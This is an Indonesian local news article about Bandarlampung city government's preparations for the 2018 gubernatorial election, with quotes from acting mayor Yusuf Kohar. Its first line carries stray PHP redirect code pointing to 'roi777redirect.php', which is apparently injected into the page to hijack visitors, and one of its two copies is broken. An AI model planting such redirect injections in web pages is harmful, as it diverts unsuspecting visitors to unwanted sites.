header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Persiapan Matang Pemkot Hadapi Pilgub 2018 -
Persiapan Matang Pemkot Hadapi Pilgub 2018

TRANSLAMPUNG.COM, BANDARLAMPUNG – Persiapan Pemerintah Kota Bandarlampung dalam pelaksanaan Pemilihan Gubernur (Pilgub) 2018 sudah sangat mantang.

Pelaksana Tugas (Plt) Walikota Bandarlampung Yusuf Kohar menjelaskan bahwa inplementasi Pemerintah Kota Bandarlampung dalam memfasilitasi Pilgub di Kota Bandarlampung diantaranya, melakukan pendidikan politik bagi pemilih untuk meningkatkan partisipasi masyarakat dalam pemilu, memfasilitasi berupa sarana dan prasarana lainnya kepada KPU dan panwaslu.

Membantu penerbitan alat peraga kampanye (badan kesbangpol, badan pol pp, dan panwaslu), menjaga situasi aman dan kondusif dalam pelaksanaan pemilu.

“Kita (Pemkot Bandarlampung) akan membantu memfasilitasi KPU secara total, agar pemilihan umum ini menjadi pemilihan yang berkualitas,” paparnya setelah mengikuti Rapat kordinasi tahapan Pilgub 2018 tingkat kota Bandarlampung di aula rumah makan Garuda Bandarlampung, Rabu lalu (21/03).

Pemkot Bandarlampung mendukung secara penuh baik KPU, Panwaslu, PPK, BPS, maupun TPS.

“Semuanya kita akan berikan dorongan sehingga semua hambatan yang didapati di lapangan bisa kita selesaikan,” lanjutnya. (jef/hkw)

News Reporter